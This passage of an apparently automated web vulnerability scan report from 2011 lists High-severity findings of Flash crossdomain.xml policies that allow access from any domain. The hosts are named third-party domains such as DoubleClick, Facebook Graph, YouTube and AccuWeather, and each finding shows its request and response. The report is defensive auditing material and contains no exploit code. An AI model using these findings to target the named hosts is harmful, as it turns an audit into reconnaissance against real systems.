Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.br.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.7. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 19:42:14 GMT
Date: Thu, 03 Feb 2011 13:42:58 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.8. http://admin.brightcove.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: admin.brightcove.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "4fbbc6624625a7f4c2704c08908b31df:1283167753"
Last-Modified: Mon, 30 Aug 2010 11:29:13 GMT
Accept-Ranges: bytes
Content-Length: 386
Content-Type: application/xml
Cache-Control: max-age=1200
Date: Thu, 03 Feb 2011 18:53:04 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<!-- Note: secure=false is confusing, but basically its saying
to allow SSL connections. Their reasoning is something
abo
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

5.9. http://ajax.googleapis.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Thu, 03 Feb 2011 22:00:31 GMT
Date: Wed, 02 Feb 2011 22:00:31 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 56574

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

5.10. http://api.feedzilla.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.feedzilla.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: api.feedzilla.com
Proxy-Connection: keep-alive
Referer: http://urlwww--feedzilla--com.rtrk.com/tools/news-widget.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Nov 2010 12:12:30 GMT
Accept-Ranges: bytes
ETag: "54d96c63507bcb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Thu, 03 Feb 2011 16:01:12 GMT
Content-Length: 293

...<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xsi:noNamespaceSchemaLocation="http://www.adobe.com
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.11. http://beacon.afy11.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beacon.afy11.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: beacon.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 13:42:57 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.12. http://c5.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c5.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c5.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 19 May 2008 09:04:15 GMT
ETag: "77adf2-f7-44d91a5da81c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 247
X-Varnish: 1047669310
Date: Thu, 03 Feb 2011 16:11:49 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.13. http://c7.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 19 May 2008 09:04:15 GMT
ETag: "77adf2-f7-44d91a5da81c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 247
X-Varnish: 1575557626
Date: Thu, 03 Feb 2011 16:09:41 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.14. http://dev.virtualearth.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dev.virtualearth.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Mon, 13 Dec 2010 18:38:09 GMT
Accept-Ranges: bytes
ETag: "a908de3f49acb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:06:48 GMT
Connection: close
Content-Length: 277

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-r
...[SNIP]...

5.15. https://graph.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://graph.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: graph.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Sat, 05 Mar 2011 16:15:09 GMT
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

5.16. http://gsbmtg.rtrk.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gsbmtg.rtrk.com

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:10:20 GMT
Server: Apache
Last-Modified: Fri, 05 Mar 2010 01:28:54 GMT
ETag: "cc-48103a373c180"
Accept-Ranges: bytes
Content-Length: 204
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: application/xml
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7d45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:39:12 GMT;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

5.17. http://i1.ytimg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i1.ytimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: i1.ytimg.com
Proxy-Connection: keep-alive
Referer: http://www.youtube.com/v/H9TrHLL-oTU&hl=en_US&fs=1&rel=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 27 Aug 2010 02:31:32 GMT
Date: Wed, 02 Feb 2011 19:09:33 GMT
Expires: Wed, 09 Feb 2011 19:09:33 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=604800
Age: 76333
Content-Length: 102

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.18. http://lab.arc90.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lab.arc90.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: lab.arc90.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Sat, 02 Jan 2010 21:22:51 GMT
ETag: "220281-8b-47c35173060c0"
Content-Type: application/xml
Content-Length: 139
Date: Thu, 03 Feb 2011 16:21:59 GMT
X-Varnish: 1335021700
Age: 0
Via: 1.1 varnish
Connection: close

<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

5.19. http://loga2.doubleverify.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://loga2.doubleverify.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: loga2.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Length: 378
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 08:19:04 GMT
Accept-Ranges: bytes
ETag: "0ccdbb4d97ca1:9f7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:07:01 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.20. http://motifcdn2.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://motifcdn2.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: motifcdn2.doubleclick.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "adb6a2c1ae7705ddf1599956b34e42c2:1222813852"
Last-Modified: Tue, 30 Sep 2008 22:30:52 GMT
Content-Type: application/xml
Date: Thu, 03 Feb 2011 16:07:22 GMT
Content-Length: 339
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.21. http://netweather.accuweather.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://netwx.accuweather.com/netWx-V212.swf?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather&myspace=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:50 GMT
Server: PWS/1.7.1.2
X-Px: ht jfk-agg-n11.panthercdn.com
ETag: "aaf332b5b423c71:14685"
Cache-Control: max-age=604800
Expires: Mon, 07 Feb 2011 08:48:33 GMT
Age: 286037
Content-Length: 206
Content-Type: text/xml
Last-Modified: Tue, 19 Dec 2006 21:29:04 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

5.22. http://news.feedzilla.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.feedzilla.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: news.feedzilla.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Nov 2010 12:12:30 GMT
Accept-Ranges: bytes
ETag: "54d96c63507bcb1:0"
Server: Microsoft-IIS/7.5
Date: Thu, 03 Feb 2011 16:22:30 GMT
Connection: close
Content-Length: 293

...<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xsi:noNamespaceSchemaLocation="http://www.adobe.com
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.23. http://omnituretrack.local.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituretrack.local.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: omnituretrack.local.com

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:06 GMT
Server: Omniture DC/2.0.0
xserver: www333
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.24. http://questionmarket.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://questionmarket.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: questionmarket.com

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:34:33 GMT
Server: Apache
Last-Modified: Thu, 22 Apr 2010 18:40:30 GMT
ETag: "1feaa12-ca-484d7a52d6637"
Accept-Ranges: bytes
Content-Length: 202
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

5.25. http://rtsys.reachlocal.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rtsys.reachlocal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rtsys.reachlocal.com

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:23:37 GMT
Server: Apache
Last-Modified: Fri, 05 Mar 2010 01:28:54 GMT
ETag: "cc-48103a373c180"
Accept-Ranges: bytes
Content-Length: 204
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: application/xml
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7d45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:52:28 GMT;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

5.26. http://rtsys.rtrk.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rtsys.rtrk.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rtsys.rtrk.com

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:23:40 GMT
Server: Apache
Last-Modified: Fri, 05 Mar 2010 01:28:54 GMT
ETag: "cc-48103a373c180"
Accept-Ranges: bytes
Content-Length: 204
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: application/xml
Set-Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:52:21 GMT;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

5.27. http://s.ytimg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.ytimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.ytimg.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 27 Aug 2010 02:31:32 GMT
Date: Wed, 02 Feb 2011 19:09:39 GMT
Expires: Wed, 09 Feb 2011 19:09:39 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=604800
Age: 76440

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.28. http://s0.2mdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Wed, 02 Feb 2011 19:09:39 GMT
Expires: Thu, 03 Feb 2011 19:09:39 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 76463

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.29. http://s1.srtk.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s1.srtk.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s1.srtk.net

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:23:39 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 26 Jan 2011 00:57:37 GMT
ETag: "1197a8-ff-49ab551aea240"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
...[SNIP]...

5.30. http://tags.crwdcntrl.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.crwdcntrl.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.crwdcntrl.net

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:23:50 GMT
Server: Apache/2.2.8 (CentOS)
Last-Modified: Tue, 09 Jun 2009 18:20:38 GMT
ETag: "2958196-a5-46bee6a616980"
Accept-Ranges: bytes
Content-Length: 165
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control    permitted-cross-domain-policies="master-only" />
   <allow-access-from    domain="*" />
</cross-domain-policy>

5.31. http://vortex.accuweather.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vortex.accuweather.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: vortex.accuweather.com
Proxy-Connection: keep-alive
Referer: http://netwx.accuweather.com/netWx-V212.swf?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather&myspace=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 09 Feb 2010 20:00:37 GMT
Accept-Ranges: bytes
ETag: "8020f08bc2a9ca1:2cd"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Host: origin1
Cache-Control: max-age=3600
Date: Thu, 03 Feb 2011 16:23:58 GMT
Connection: close
Content-Length: 1403

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="*.accuweather.com" />
<allow-access-from domain="*.accuweatherchannel.com" />
<allow-access-from domain="*.discovery.com" />
<allow-access-from domain="*.oddcast.com" />
<allow-access-from domain="*.ucview.com" />
<allow-access-from domain="*.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.adcdn.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.dartmotif.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="true" />
...[SNIP]...
<allow-access-from domain="maps.google.com" />
<allow-access-from domain="maps.yahooapis.com"/>
<allow-access-from domain="spm161.brinkster.net" />
<allow-access-from domain="www.dotglu.com" />
<allow-access-from domain="www.johnfrieda.com" />
<allow-access-from domain="www.travelboards.com" />
<allow-access-from domain="www.topix.com"/>
<allow-access-from domain="66.42.146.50" />
<allow-access-from domain="66.42.146.66" />
<allow-access-from domain="68.167.121.226" />
...[SNIP]...

5.32. http://weather.weatherbug.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weather.weatherbug.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: weather.weatherbug.com

Response

HTTP/1.0 200 OK
Content-Length: 320
Content-Type: text/xml
Last-Modified: Thu, 04 Nov 2010 12:35:42 GMT
Accept-Ranges: bytes
ETag: "df8e9dcb1c7ccb1:dcbe"
Server: Microsoft-IIS/6.0
p3p: CP="NON DSP COR NID"
